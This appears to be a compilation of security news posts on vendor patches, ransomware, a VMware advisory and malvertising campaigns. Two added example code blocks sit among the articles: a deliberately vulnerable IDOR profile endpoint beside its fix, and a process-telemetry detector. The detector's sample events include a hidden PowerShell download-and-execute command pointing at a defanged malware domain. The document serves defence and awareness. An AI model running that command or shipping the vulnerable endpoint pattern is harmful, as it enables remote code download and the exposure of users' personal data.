
11 High-Severity Flaws in Security Products Patched by Cisco

 

This week, Cisco released its April 2022 bundle of security advisories for Cisco Adaptive Security Appliance (ASA), Firepower Threat Defense (FTD), and Firepower Management Center (FMC). 

The semiannual bundled advisories include a total of 19 flaws in Cisco security products, with 11 of them being classified as "high severity." 

The most serious of these is CVE-2022-20746 (CVSS score of 8.8), an FTD vulnerability caused by improper handling of TCP flows. It can be exploited remotely without authentication to cause a denial of service (DoS) condition. 

“An attacker could exploit this vulnerability by sending a crafted stream of TCP traffic through an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition,” Cisco explains in an advisory. 

Cisco has addressed the problem in FTD releases 6.6.5.2 and 7.1.0.1. Fixes will also be included in FTD releases 6.4.0.15 and 7.0.2, due next month. Several more DoS vulnerabilities, all rated "high severity", were fixed in the same FTD releases, including some that affect ASA as well; those were addressed in ASA releases 9.12.4.38, 9.14.4, 9.15.1.21, 9.16.2.14, and 9.17.1.7. Other problems fixed by these upgrades could result in privilege escalation or data manipulation over an IPsec IKEv2 VPN channel.

Cisco also fixed an ASA-specific flaw that allowed an attacker to read sensitive information from process memory. According to the company, Firepower Management Center (FMC) releases 6.6.5.2 and 7.1.0.1, as well as the upcoming releases 6.4.0.15 and 7.0.2, resolve a remotely exploitable security protection bypass. 

Cisco stated, “An attacker could exploit this vulnerability by uploading a maliciously crafted file to a device running affected software. A successful exploit could allow the attacker to store malicious files on the device, which they could access later to conduct additional attacks, including executing arbitrary code on the affected device with root privileges."

The semiannual bundled publication of security advisories also includes fixes for eight medium-severity vulnerabilities in these security products. Cisco is not aware of any attacks exploiting these flaws.

New Vulnerabilities Expose EVlink Electric Vehicle Charging Stations to Remote Hacking

 

In a security advisory, Schneider Electric confirmed the discovery and patching of multiple vulnerabilities in EVlink EV charging stations that could expose these deployments to hostile hackers. 

The flaws affect the EVlink City (EVC1S22P4 and EVC1S7P4), Parking (EVW2, EVF2, and EVP2PE), and Smart Wallbox (EVB1A) devices, as well as other products that are being discontinued. 

Cross-site request forgery (CSRF) and cross-site scripting (XSS) flaws stand out among the vulnerabilities addressed, both of which could be used to launch actions impersonating legitimate users; additionally, a vulnerability was addressed that could give attackers complete access to charging stations via brute force attacks. 

The most serious vulnerability received a Common Vulnerability Scoring System (CVSS) score of 9.3 out of 10. The firm warns that exploiting it could have serious consequences. 

Schneider’s notice stated, “Malicious manipulation of charging stations could lead to denial of service (DoS) attacks, deregistration, and disclosure of sensitive information.” 

The majority of these flaws require physical access to the system's internal communication ports, while some more sophisticated attacks can be carried out remotely over the Internet. According to Tony Nasr, the researcher who first disclosed the flaws, exploitation involves sending specially crafted requests and does not require any interaction from the affected users. 

“Attacks allow threat actors to exploit compromised EVCS in a similar way to the operation of a botnet, allowing the deployment of various attacks.” 

Exploiting the CSRF and XSS vulnerabilities, on the other hand, requires a certain level of user interaction. While Internet-exposed EVlink deployments are the most dangerous attack vector, attackers could still pose a serious risk to these stations over the LAN, since the EVlink configuration requires network connectivity for remote control and more efficient management. 

Nasr concluded by stating that these flaws were discovered as part of a larger research project on charging station management systems for electric vehicles. The study's full findings will be released in the coming months.

Cisco Releases Patches for Several High Severity Vulnerabilities

 

This week, Cisco addressed a number of high-severity flaws in its Web Security Appliance (WSA), Intersight Virtual Appliance, Small Business 220 switches, and other products. If all of these issues are successfully exploited, attackers may be able to cause a denial of service (DoS), perform arbitrary commands as root, as well as obtain administrator rights. 

Two high-severity vulnerabilities (CVE-2021-34779 and CVE-2021-34780) were discovered in the Link Layer Discovery Protocol (LLDP) implementation of the Small Business 220 series smart switches, allowing arbitrary code execution and a denial of service condition respectively. The software update for the switch series additionally fixes four medium-severity issues that could cause LLDP memory corruption on a vulnerable device. 

Insufficient input validation in the Intersight Virtual Appliance is another serious flaw. The vulnerability, tracked as CVE-2021-34748, could allow arbitrary commands to be executed with root privileges. 

Cisco further patched two high-severity flaws in its ATA 190 series and ATA 190 series multiplatform (MPP) software this week. The issues, tracked as CVE-2021-34710 and CVE-2021-34735, could be used to execute malicious code and to create a denial of service (DoS) condition, respectively. 

One of these flaws was reported to Cisco by firmware security company IoT Inspector, which published an alert on Thursday, October 7, detailing its findings. 

Cisco also fixed a race condition in the AnyConnect Secure Mobility Client for Linux and macOS that could have been exploited to execute arbitrary code with administrator rights, as well as an improper memory management vulnerability in AsyncOS for Web Security Appliance (WSA) that could result in DoS. 

CVE-2021-1594, an insufficient input validation vulnerability in the REST API of Cisco Identity Services Engine (ISE), is yet another high-severity weakness patched this week. An attacker in a man-in-the-middle position could leverage the issue to execute arbitrary commands with root privileges by decrypting HTTPS traffic between two ISE personas on different nodes. 

Cisco also provided fixes for medium-severity issues in TelePresence CE and RoomOS, Smart Software Manager On-Prem, 220 series business switches, Identity Services Engine, IP Phone software, Email Security Appliance (ESA), DNA Center, and Orbital. Cisco has issued patches for all these flaws and says it is not aware of any public exploits for them.

Confluence Servers are Being Targeted by the New Atom Silo Malware

 

A new ransomware operator is targeting Confluence servers, gaining initial access to susceptible systems by exploiting a recently reported vulnerability. According to Sean Gallagher and Vikas Singh of Sophos, the new threat actors, called Atom Silo, are exploiting the flaw in the hopes that Confluence server owners have yet to apply the essential security patches to fix the vulnerability. 

Atlassian Confluence is a web-based virtual workspace that allows business teams to collaborate on projects and communicate. According to Sophos, Atom Silo recently carried out a two-day cyberattack in which the attackers gained initial access to the victim's corporate environment through a Confluence vulnerability for which Atlassian had already published fixes. 

Atlassian released those security fixes on August 25 to address a Confluence remote code execution (RCE) vulnerability, tracked as CVE-2021-26084, that had been exploited in the wild. The researchers also found that the ransomware used by this new gang is nearly identical to LockFile, which in turn is very similar to the LockBit malware.

According to Sophos, the Atom Silo operators used several novel techniques that made the intrusion exceedingly difficult to investigate, including the side-loading of malicious dynamic-link libraries (DLLs) designed to disrupt endpoint protection software. After compromising the Confluence server and installing a backdoor, the threat actors used DLL side-loading to execute a stealthier second-stage backdoor on the compromised machine. 

"The incident investigated by Sophos shows how quickly the ransomware landscape can evolve. This ultra-stealthy adversary was unknown until a few weeks ago," said Sean Gallagher, a senior threat researcher at Sophos. "In addition, Atom Silo made significant efforts to evade detection prior to launching the ransomware, which included well-worn techniques used in new ways. Other than the backdoors themselves, the attackers used only native Windows tools and resources to move within the network until they deployed the ransomware." 

According to Sophos, ransomware operators and other malware authors are becoming increasingly adept at exploiting such flaws, latching onto publicly available proof-of-concept exploits for freshly discovered vulnerabilities and weaponizing them quickly. 

"To reduce the threat, organizations need to both ensure that they have robust ransomware and malware protection in place, and are vigilant about emerging vulnerabilities on Internet-facing software products they operate on their networks," they added.

Cisco Published Two Critical and Six High-Severity Patches for Nexus Gear

 

Cisco Systems, the American multinational technology corporation based in San Jose, California, has published six security patches for its high-end Nexus 9000 series networking gear, ranging in severity from critical to high and medium. 

Cisco Systems designs, produces and distributes networking gear, software, telecom equipment, and a variety of other high-tech products and services. 

The most critical flaw (rated 9.1 out of 10) could allow a remote, unauthenticated attacker to read or write arbitrary files through an application programming interface used by Cisco 9000 series switches that run its software-defined networking data center solution. 

Cisco additionally patched two high-severity Nexus 9000 flaws (CVE-2021-1586 and CVE-2021-1523) as well as three medium-severity flaws (CVE-2021-1583, CVE-2021-1584, and CVE-2021-1591). Both high-severity flaws (each with a CVSS base score of 8.6) are denial-of-service issues. 

The critical vulnerability, CVE-2021-1577, affects the Cisco Application Policy Infrastructure Controller (APIC) and the Cisco Cloud Application Policy Infrastructure Controller (Cloud APIC). APIC is the primary architectural element of Cisco Application Centric Infrastructure, which runs on Cisco Nexus 9000 Series nodes.

The Cisco Nexus 9000 Series combines proven high performance with compact form factors, low latency, and strong power efficiency. The switches can run in either Cisco NX-OS Software or Application Centric Infrastructure (ACI) mode and are suitable for both conventional and fully automated data center setups. 

Cisco describes a second high-severity Nexus 9000 series flaw as a loophole within the Fabric Switches ACI Mode Queue Wedge. 

“This vulnerability is due to improper access control. An attacker could exploit this vulnerability by using a specific API endpoint to upload a file to an affected device,” wrote Cisco in its Wednesday security bulletin. Affected products are Cisco APIC and Cisco Cloud APIC. 

As with all of the flaws and fixes published on Wednesday, Cisco stated that fixes are available for each of them and that it is unaware of any public exploits for the problems that have been fixed. The fix released on Wednesday, August 25, was included in Cisco's "bundled publication" of security updates for its Firepower eXtensible Operating System and its Linux-based NX-OS software. 

“A vulnerability in the Multi-Pod or Multi-Site network configurations for Cisco Nexus 9000 Series Fabric Switches in Application Centric Infrastructure (ACI) mode could allow an unauthenticated, remote attacker to unexpectedly restart the device, resulting in a denial of service (DoS) condition,” wrote Cisco. 

Cisco advises that, even after the patches are applied, recovering from this flaw requires "a manual intervention to power-cycle the device to recover." The affected devices are generation 1 N9K (Nexus 9000) series fabric switches.

Zoom Security Flaw: Now Hackers Can Take Control Of Your PC, Wait For Patch

 


Zoom security issues have lately been troubling users worldwide, and often. The Zoom video conferencing app was not in the limelight before the pandemic, but since the arrival of Covid-19 much has changed, including the way people work. As working from home became a necessity and the app's popularity suddenly grew, Zoom introduced a series of security measures. 

However, as of now, it is being observed that the security measures that had been taken a year ago are failing to secure users' data from threat actors.

The vulnerability allows a remote code execution (RCE) attack that takes control of the host PC. Two researchers from the cybersecurity firm Computest, Daan Keuper and Thijs Alkemade, demonstrated it at the Pwn2Own 2021 competition organized by the Zero Day Initiative and were awarded $200,000 for their findings. 

How does this work? 


First, the attacker must either belong to the same organizational domain as the host PC's user or be admitted to the meeting by the host. Once in the meeting, the attacker can trigger a three-stage chain that installs an RCE backdoor on the victim's PC. 

In other words, the threat actors gain access to your PC and can run remote commands on it, which in turn gives them access to your sensitive data.

What makes this even more dangerous is that the attackers can carry out the operation without the victim doing anything at all, so it is essential to add further layers of security that can slow down such attacks in future. 

The attack works against Zoom's Mac and Windows clients; Zoom's iOS and Android apps have not been tested yet. Notably, the browser version is not affected. 

Currently, Zoom is yet to take measures, and the technical details of the attack have not been reported to the public, yet. Reportedly, the patch will arrive on Zoom for Mac and Windows within the next 90 days. 

Guardian: Truecaller Fixes Location Vulnerability In Its New App

Caller ID and spam blocking company Truecaller recently launched its "Guardian" application, which allows users to share their live location with trusted guardians from their contact lists. Anand Prakash, a Bangalore-based cybersecurity expert, pointed out that the app had a major vulnerability, which Truecaller soon fixed. The personal safety app has an emergency option that informs the user's selected contacts of his or her live location in real time during an emergency. Mr. Prakash, who founded the cybersecurity startup PingSafe, says the vulnerability could have allowed any threat actor to gain access to any user's account using only a phone number. 

From there, the attacker could hijack the user account and take all of its data, including the live location (of both the user and the emergency contacts), the user's date of birth, and the profile picture. Guardian was released on 3rd March and has over 100,000 downloads on the Play Store. "We are using an encrypted line between the two different clients...So that actually means that you can't revisit a previous journey because we don't store that data...The data that is shared with the 'forever sharing' option is the state of battery and signal, along with the location to help the trusted guardians follow the user," says Truecaller. Mr. Prakash contacted Truecaller the day after the launch to notify the company of the vulnerability. 

A basic API error was the cause of the flaw. When API (Application Programming Interface) problems like this persist, they allow attackers to access website data and functionality that is normally not accessible to a user. Mr. Prakash says he looked into the app immediately after its release and soon discovered issues. Using the app's "login API", the researcher was able to gain access to another person's profile using that person's phone number. 

The same pattern was tried with other contacts, and the issue was reported to Truecaller. The company soon fixed the issue and later notified the expert. Mr. Prakash identified the issue as an "Insecure Direct Object Reference" (IDOR) flaw. PingSafe's report says, "companies tend to miss out on such fundamental issues even after rigorous security assessments. The repercussions of such problems are enormous and impact customers' privacy and lead to companies' revenue losses." 
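The flaw described above is a classic insecure direct object reference: the profile returned is chosen by a client-supplied phone number rather than by the identity behind the session. The following is an added illustration, not Truecaller's code; the profile data, the session store and the function names are all constructed for the example.

```python
"""Added example (not Truecaller's code): an insecure direct object reference
(IDOR) on a profile-lookup endpoint, beside its hardened version.
All names, the session store and the sample profiles are constructed."""
import secrets

# Constructed sample data: two users keyed by phone number.
PROFILES = {
    "+911000000001": {"name": "User A", "dob": "1990-01-01", "location": "A-loc"},
    "+911000000002": {"name": "User B", "dob": "1985-05-05", "location": "B-loc"},
}

# Session store: opaque token -> phone number of the authenticated user.
SESSIONS = {}


class Unauthorized(Exception):
    """No valid session was presented."""


class Forbidden(Exception):
    """Valid session, but it does not own the requested record."""


def login(phone: str) -> str:
    """Simulates a completed phone-number login and issues an opaque token."""
    if phone not in PROFILES:
        raise Unauthorized("unknown phone number")
    token = secrets.token_urlsafe(16)
    SESSIONS[token] = phone
    return token


def vulnerable_get_profile(token: str, phone: str) -> dict:
    """IDOR: the phone number in the request selects the record, and the only
    check is that *some* valid session exists. Any logged-in user can therefore
    read any other user's profile by supplying that user's number."""
    if token not in SESSIONS:
        raise Unauthorized("login required")
    return dict(PROFILES[phone])


def hardened_get_profile(token: str, phone: str) -> dict:
    """Fix: the record a caller may read is bound to the identity behind the
    session. A mismatch is refused, so the client-supplied value cannot be
    used to pivot to someone else's data."""
    owner = SESSIONS.get(token)
    if owner is None:
        raise Unauthorized("login required")
    if phone != owner:
        raise Forbidden("session does not own this profile")
    return dict(PROFILES[phone])


def demo() -> tuple:
    """User A, logged in, asks for User B's profile on both endpoints.
    Returns (vulnerable_leaked, hardened_leaked)."""
    token_a = login("+911000000001")
    leaked = vulnerable_get_profile(token_a, "+911000000002")["name"] == "User B"
    try:
        hardened_get_profile(token_a, "+911000000002")
        hardened_leaked = True
    except Forbidden:
        hardened_leaked = False
    return leaked, hardened_leaked


if __name__ == "__main__":
    print(demo())  # (True, False)
```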

SAP Issued Warning and Updates Regarding the Serious Flaws with the Code Injection

 

SAP (Systems, Applications and Products in Data Processing) is a German multinational software corporation known for developing software that manages business operations and customer relations. SAP is the name of both the company and its software. SAP describes its products as "future-proof Cloud ERP (Enterprise Resource Planning) solutions that will power the next generation of business," intended to boost an organization's efficiency and productivity by automating repetitive tasks and making better use of time, money, and resources. 

SAP published 14 new Security Notes on its December 2020 Patch Day. In January 2021 it published another set of 7 new Security Notes, later adding updates to them. Five of the seven carry SAP's highest severity rating, Hot News. Later in the month, the company published 10 advisories documenting flaws and fixes for a range of serious security vulnerabilities. Among the reported vulnerabilities, the most important issue, in SAP Business Warehouse, carries a CVSS score of 9.9. 

The first note addressed CVE-2021-21465, which according to SAP covers multiple issues in the Database Interface. These bugs are an SQL injection and a missing authorization check, with a CVSS score of 6.5. SQL injection is a code injection technique that can, at times, destroy the database; it is one of the most common techniques used by hackers. According to Onapsis, a firm that secures Oracle and SAP applications, the missing authorization check could easily be exploited to read any table in the database. 

Noting that only minimal privileges are required for successful exploitation, Onapsis wrote in a blog post: "An improper sanitization of provided SQL commands allowed an attacker to execute arbitrary SQL commands on the database which could lead to a full compromise of the affected system." SAP decided to fix these bugs by disabling the function module; applying the patches therefore disables all applications that call this function module. 

Another serious issue is a code injection flaw in both Business Warehouse and BW/4HANA, tracked as CVE-2021-21466. It results from insufficient input validation and can be abused to inject malicious code that is stored persistently as a report. Such issues potentially affect the confidentiality, integrity, and availability of systems. The remaining three of the five updates are fixes for notes originally released in 2018 and 2020. 

 Further SAP added as a warning, “An issue in the binding process of the Central Order service to a Cloud Foundry application” that could have allowed “unauthorized SAP employees to access the binding credentials of the service”.

NSA Issued Warning Against Russian State-Sponsored Attackers for Exploiting VMware Access

On December 7, the United States National Security Agency (NSA) issued an advisory warning that Russian malicious actors pose a serious threat to VMware users by installing malware on corporate systems and accessing protected data. 
The attacks came two weeks after the virtualization software company publicly disclosed the vulnerability. According to the company, the malicious actor(s) are targeting VMware Workspace ONE, Connector, Identity Manager, and Identity Manager Connector products for Windows and Linux. The identities of the attackers, and when the activity started, have not been disclosed. 

What is VMware? 

VMware is an American software company that provides cloud computing and virtualization software and services. VMware was one of the first commercially successful companies to virtualize the x86 architecture.

Its desktop software runs on Microsoft Windows, Linux, and macOS, while its enterprise software hypervisor for servers, VMware ESXi, is a bare-metal hypervisor that runs directly on server hardware without requiring an additional underlying operating system. 

When did the threat surface? 

In late November, VMware acknowledged the threat and published temporary workarounds while it investigated further. The escalation-of-privileges bug itself, however, was not fixed until December 3, 2020. 

The same day witnessed the United States Cybersecurity and Infrastructure Security Agency (CISA) releasing a brief bulletin to encourage administrators to review, apply, and patch as soon as possible.

Meanwhile, according to the NSA, VMware did not clearly disclose that the bug was being actively exploited, which allowed adversaries to keep leveraging the vulnerability to steal data and abuse shared authentication systems. 

"The misuse via shell injection led to the installation of a web shell and follow up malicious activity where Security Assertion Markup Language (SAML) in the form of authentication assertions generated and sent to Microsoft Active Directory Federation Services, which allow actors access to protected data," the agency said. 

What is SAML? 

Security Assertion Markup Language (SAML) is an open standard for exchanging authentication and authorization data between parties, in particular between an identity provider and a service provider. SAML is an XML-based markup language for security assertions, the statements that service providers use to make access-control decisions. 

Besides urging organizations to update affected systems to the latest version, the agency is also pushing them toward stronger security management. 

As of now, the threat has not gone away; the NSA has advised agencies to monitor all their systems and to scan server logs for the presence of "exit statements" that indicate possible malicious activity. 

Attention! Malvertising Campaigns Using Exploit Kits On The Rise


Of all the things online advertising can be used for, spreading malware is the one that surpasses all the others in harm.

Recently, researchers uncovered a new 'malvertising' campaign that, according to sources, was carried out using the "Domen Social Engineering Toolkit".
'Malvertising' (malicious advertising) is the use of online advertising to spread malware. Most typically it is done by inserting malware or malicious advertisements into legitimate advertising web pages or networks.

According to informed sources, the campaign was uncovered while it was using a VPN service as bait. It involved a group of domains that gave Domen's attack mechanism a new twist.

According to the reports, the campaign was built around 'search-one[.]info' as the fake page, 'mix-world[.]best' as the download site and 'panel-admin[.]best' as the backend panel.

As revealed in the reports, the campaign redirected users and exposed them to 'Smoke Loader', a downloader that installs secondary payloads. And that is what it did: the payloads consisted of the 'Vidar' stealer, 'Buran' ransomware and the 'IntelRapid' cryptominer.

Needless to say, this is not the first campaign focused on such payloads. Domen's malvertising, per the source, had started in September last year. The social engineering toolkit was used to compromise a website and fool users into clicking on a fake 'Adobe Flash Player' update. The click started a download of "download.hta", which then used PowerShell to connect to "xyxyxyxyxy[.]xyz" and download the 'NetSupport Remote Access Trojan' (RAT).

With amplification in the usage of the internet and online means, it becomes a top priority to build up a structured and strong defense mechanism to fight and prevent Malvertising.

Hiring security professionals is a sound prerequisite and a building block for that defense structure, and keeping up with the latest updates and patches must be a top priority.

Word has it that in most cases 'exploit kits' are used to distribute the malware payloads. Organizations should therefore have a clear picture of all their choke points, so that a malvertising campaign's attack payloads can be detected and dealt with in time.
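The delivery chain described above (fake Flash update, download.hta, PowerShell reaching out to a domain) leaves a recognizable process ancestry on the endpoint. The detector below is an added example, not code from the original post or the cited reports; it runs over constructed process-creation events, and the field names, paths and rule thresholds are assumptions for the illustration (the defanged domain is the one quoted in the post).

```python
"""Added example (not from the original post): flag the .hta -> PowerShell
download chain in process-creation telemetry. Event fields and all sample
values are constructed for this illustration."""
import re

# Constructed process-creation events: pid, parent pid, image path, command line.
EVENTS = [
    {"pid": 1, "ppid": 0, "image": r"C:\Program Files\Browser\browser.exe",
     "cmdline": "browser.exe"},
    {"pid": 2, "ppid": 1, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Users\alice\Downloads\download.hta"'},
    {"pid": 3, "ppid": 2,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://xyxyxyxyxy[.]xyz/x')\""},
    # Benign admin script: PowerShell without a download cue or an mshta parent.
    {"pid": 4, "ppid": 0,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

# Paths an unprivileged user can write to (assumed list, extend per environment).
USER_WRITABLE = re.compile(r"\\(Users|Temp|AppData|ProgramData)\\", re.I)
# Command-line fragments that indicate PowerShell is fetching remote content.
DOWNLOAD_CUES = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b|https?://)",
    re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_suspicious(events):
    """Return (pid, reason) tuples for events matching the chain's stages."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        image = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_image = basename(parent["image"]) if parent else ""
        cmd = e["cmdline"]
        # Stage 1: mshta.exe executing an .hta file dropped in a user-writable path.
        if image == "mshta.exe" and ".hta" in cmd.lower() and USER_WRITABLE.search(cmd):
            findings.append((e["pid"], "mshta running .hta from user-writable path"))
        # Stage 2: PowerShell whose parent is mshta.exe (script host spawning a shell).
        if image == "powershell.exe" and parent_image == "mshta.exe":
            findings.append((e["pid"], "powershell spawned by mshta"))
        # Stage 3: PowerShell fetching remote content, as in the RAT download.
        if image == "powershell.exe" and DOWNLOAD_CUES.search(cmd):
            findings.append((e["pid"], "powershell with download cue"))
    return findings


def chain_detected(events) -> bool:
    """True when one PowerShell process hits both the parent and download rules,
    i.e. the full .hta -> PowerShell -> download sequence is present."""
    reasons = {}
    for pid, reason in find_suspicious(events):
        reasons.setdefault(pid, set()).add(reason)
    return any({"powershell spawned by mshta", "powershell with download cue"} <= r
               for r in reasons.values())


if __name__ == "__main__":
    for finding in find_suspicious(EVENTS):
        print(finding)
    print("chain detected:", chain_detected(EVENTS))
```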

Security Flaw in Oracle POS systems discovered

Researchers at ERPScan have discovered a new security flaw in the Oracle Micros Point-of-Sale (POS) systems that has left over 300,000 systems vulnerable to attack from hackers.

The flaw was discovered in September 2017 by security researcher Dmitry Chastuhin and was assigned the identifier CVE-2018-2636.

Oracle has already issued updates for this issue earlier in the month but due to companies’ fear of unstable patches and losses, it is suspected that it may take months for the patch to reach affected systems.

According to Chastuhin, the flaw enables attackers to collect configuration files from the systems and gain access to the server.

Hackers can also exploit the flaw remotely using carefully crafted HTTP requests. Many of the vulnerable systems have already been misconfigured to allow such access and are available online to be easily exploited if the patches aren’t used soon.

Patches for the flaw were made available in January 2018 in Oracle's Critical Patch Update (CPU).

Microsoft provides urgent security fix for Windows

Microsoft has recently released a security fix for its Windows operating systems to close a security gap that allowed hackers access to a victim's computer.

Microsoft has said that the vulnerability present in their operating system would have allowed a hacker to gain complete access to an affected computer.

The vulnerability is present in Windows Vista, Windows 7, Windows 8 and 8.1 and Windows RT. These operating systems represent two out of three computers in the world that run a Microsoft operating system.

The company had previously provided an update like this in November 2014 also.

The flaw is said to exist in the final version of Windows 10 also that will be available to users from July 29.

The security fix will be delivered through Windows Update.